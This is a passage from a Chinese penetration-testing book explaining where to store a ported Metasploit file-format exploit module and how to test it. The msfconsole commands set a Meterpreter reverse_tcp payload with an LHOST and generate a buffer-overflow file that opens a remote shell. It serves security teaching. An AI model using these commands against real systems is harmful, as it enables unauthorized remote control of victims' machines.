《Metasploit渗透测试手册》—第8章8.6节移植并测试新的漏洞利用代码模块

简介:
+关注继续查看

本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第8章8.6节移植并测试新的漏洞利用代码模块,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。

8.6 移植并测试新的漏洞利用代码模块
Metasploit渗透测试手册
在上节中学习了怎样使用可用的概念验证代码开发完整的Metasploit模块,本节中将把该模块保存到合适的位置,并测试其是否正常运转。

准备
了解漏洞利用代码模块要存储的文件夹位置是非常重要的,有助于追踪不同模块所在位置,同时也有助于Metasploit框架理解模块的基本用法。完整的模块脚本构建完成之后,在合适的位置将其保存。

怎样实现
由于上面开发的是漏洞利用代码模块,针对的目标是Windows操作系统,影响的是特定的文件格式,因此可以根据这些信息相应地选择存储位置。查看modules/ exploits/windows目录,可以发现特定的fileformat文件夹,该文件夹用于存储文件格式相关的漏洞利用代码模块,将上面的模块保存为galan_fileformat_bof.rb。

怎样工作
接下来检查该模块功能是否正常,前面我们已经使用过大量的模块,因此这一任务很简单,采用如下步骤。

msf > use exploit/windows/fileformat/galan_fileformat_bof
msf exploit(galan_fileformat_bof) > set PAYLOAD windows/meterpreter/
reverse_tcp
msf exploit(galan_fileformat_bof) > set LHOST 192.168.56.101
msf exploit(galan_fileformat_bof) > exploit

使用exploit命令执行该模块,并创建一个可在目标机器上引发缓冲区溢出的文件。

这样就完成了模块的创建和执行过程,可以看到该过程很简洁,其中较困难的是漏洞利用脚本到Metasploit框架模块的正确转换。用户可以根据需要对现有模块进行调试或修改,也可以向Metasploit社区提交新创建的模块以便与他人分享。

本文仅用于学习和交流目的,不代表异步社区观点。非商业转载请注明作译者、出处,并保留本文的原始链接。

相关文章
|
9天前
|
人工智能 Java 测试技术
软件测试也要敲代码,为什么不让开发兼测试?
软件测试也要敲代码,为什么不让开发兼测试?
217 0
|
3月前
|
存储 算法 测试技术
测试你的红包代码
最简单直接的方法就是,调用一下代码,给一组输入数据,把结果打印出来,肉眼看一看是不是正确。
|
4月前
|
数据可视化 C++
高斯正反算—投影坐标转大地坐标、大地坐标转投影坐标(附有完整代码及测试结果)
高斯正反算—投影坐标转大地坐标、大地坐标转投影坐标(附有完整代码及测试结果)
|
4月前
|
机器学习/深度学习 传感器 算法
多种智能优化算法运行时间和不同函数测试对比附matlab代码
多种智能优化算法运行时间和不同函数测试对比附matlab代码
|
5月前
|
人工智能 搜索推荐 Java
人工智能写的十段代码,九个通过测试了
人工智能写的十段代码,九个通过测试了
7530 0
|
5月前
|
Python
一日一技:使用doctest测试Python代码的注释
一日一技:使用doctest测试Python代码的注释
98 0
|
5月前
|
人工智能 算法 IDE
让程序员动嘴写代码,Copilot测试新功能「嘿,GitHub!」
让程序员动嘴写代码,Copilot测试新功能「嘿,GitHub!」
146 0
|
5月前
|
Java 关系型数据库 MySQL
Mybatis+MySQL动态分页查询数据经典案例(含代码以及测试)
Mybatis+MySQL动态分页查询数据经典案例(含代码以及测试)
83 0
|
5月前
|
数据采集 算法 数据可视化
MMdetection框架速成系列 第03部分:简述整体构建细节与模块+训练测试模块流程剖析+深入解析代码模块与核心实现
按照抽象到具体方式,从多个层次进行训练和测试流程深入解析,从最抽象层讲起,到最后核心代码实现,希望帮助大家更容易理解 MMDetection 开源框架整体构建细节
393 0
|
6月前
|
JavaScript 前端开发 C++
Node.js:Jest测试框架测试test代码
Node.js:Jest测试框架测试test代码
91 0
Node.js:Jest测试框架测试test代码
推荐文章
更多